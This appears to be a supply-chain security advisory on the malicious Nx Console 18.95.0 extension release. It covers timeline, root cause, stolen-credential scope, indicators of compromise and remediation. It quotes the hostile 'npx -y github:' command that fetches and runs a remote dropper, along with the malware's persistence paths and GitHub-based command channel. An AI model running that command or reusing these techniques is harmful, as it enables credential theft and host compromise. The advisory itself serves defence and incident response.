Nx Console (nrwl.angular-console) 18.95.0 hijacked via TanStack-stolen GitHub creds
A malicious Nx Console v18.95.0 (publisher nrwl, ~2.2M installs across VS Code, Cursor, and JetBrains) shipped to both the VS Code Marketplace and Open VSX on 2026-05-18, live for ~18–36 minutes. Every workspace open fetched a 498KB Mini Shai-Hulud stage-2 dropper from an orphan commit in nrwl/nx. Nx telemetry estimates ~6,000 users received the build. Root cause: the May 11 TanStack compromise leaked one Nx Console maintainer's GitHub CLI credentials. Tracked as GHSA-c9j4-9m59-847w / CVE-2026-48027.
- Detected by
- Nrwl · Socket · StepSecurity
- Also known as
- Nx Console 18.95.0
- Ecosystems
- Open VSX
- Packages tracked
- 1
What happened
On 2026-05-18 the nrwl.angular-console IDE extension (Nx Console, ~2.2M installs across VS Code, Cursor, and JetBrains) was published as 18.95.0 to both the Microsoft VS Code Marketplace (live 12:30–12:48 UTC, ~18 min exposure) and Open VSX (live 12:33–13:09 UTC, ~36 min exposure). Despite the short windows, Nx team analytics estimate ~6,000 users actually received the malicious build — far higher than the 28–41 the marketplace counters showed at takedown, because the marketplace caches recent installs.
The root cause was not a direct credential leak on Nx Console itself. The TanStack burst on 2026-05-11 (npm-2026-05-shai-hulud-tanstack) exfiltrated GitHub CLI credentials from at least one Nx Console maintainer's laptop. The attacker used those credentials to run workflows on nrwl/nx-console as a legitimate contributor and to publish the malicious extension build.
The extension's main.js contains a hardcoded commit SHA 558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2 — an orphan / dangling commit in nrwl/nx, authored as @ZackDeRose, unsigned, dated 2026-05-18T03:18:03Z, with the message "Don't delete this commit before 24 hours or wiper activates". On every workspace open, the extension runs npx -y github:nrwl/nx#558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2, dragging in a 498KB obfuscated dropper disguised as a package named nx-next (PBKDF2+SHA-256 runtime string decryption).
- Stealer scope: HashiCorp Vault tokens, K8s + AWS IAM credentials, npm tokens + OIDC tokens, AWS IMDS metadata + Secrets Manager + SSM parameters, GitHub tokens + Actions secrets, 1Password CLI vault contents, filesystem private keys, connection strings, and cloud provider credentials.
- Exfiltration over HTTPS plus GitHub API as a dead-drop: it polls
api.github.com/search/commits?q=firedalazerfor tasking. - macOS persistence: a Python backdoor at
~/.local/share/kitty/cat.pyplus a LaunchAgent at~/Library/LaunchAgents/com.user.kitty-monitor.plist. - Linux: a sudoers escalation attempt.
- Activation does NOT require install hooks — workspace open is enough; only avoiding
18.95.0mitigates.
Disclosed via GHSA-c9j4-9m59-847w and tracked as CVE-2026-48027. Last clean release is 18.94.0; the fix lands in 18.100.0.
Affected packages (1)
- Open VSX
nrwl.angular-console18.95.0
Impact
- Cloud credential theft: AWS (IMDS + Secrets Manager + SSM), GCP, Azure
- Vault tokens, Kubernetes service-account tokens, kubeconfig
- npm tokens + OIDC, GitHub PATs + Actions secrets — feeds the next worm hop
- 1Password CLI vault contents and on-disk private keys
- macOS persistence via LaunchAgent (
com.user.kitty-monitor.plist) + Python backdoor (~/.local/share/kitty/cat.py) - Linux sudoers escalation attempt
- GitHub API polling (
search/commits?q=firedalazer) as resilient C2 - Workspace activation fires WITHOUT install hooks —
--ignore-scriptsdoes NOT mitigate; only avoiding 18.95.0 does
What to do
- 1Pin
nrwl.angular-consoleto<= 18.94.0or upgrade to>= 18.100.0everywhere. Refuse 18.95.0 in any extension allowlist - 2On any developer machine that opened any workspace with Nx Console between 2026-05-18T12:30Z and 2026-05-18T13:09Z (across either marketplace): treat the host as fully compromised. Rotate npm/GitHub/CI tokens, AWS/GCP/Azure keys, Vault, K8s tokens, 1Password vault, SSH keys
- 3Hunt for IOC files on macOS:
~/.local/share/kitty/cat.py,~/Library/LaunchAgents/com.user.kitty-monitor.plist,/var/tmp/.gh_update_state,/tmp/kitty-*. On Linux/macOS: any process runningcat.pyor with env var__DAEMONIZED=1 - 4Block egress to api.github.com search calls with query
firedalazer; alert on outbound HTTPS to GitHub API from extension host processes - 5Verify your installed extensions are NOT pulling commit
558b09d7ad0d1660e2a0fb8a06da81a6f42e06d2fromnrwl/nx— that commit must be considered hostile even after marketplace removal - 6Audit GitHub Actions workflow runs in
nrwl/nx-consoleandnrwl/nxbetween 2026-05-17 and 2026-05-19 for unexpected pushes by previously-unknown contributors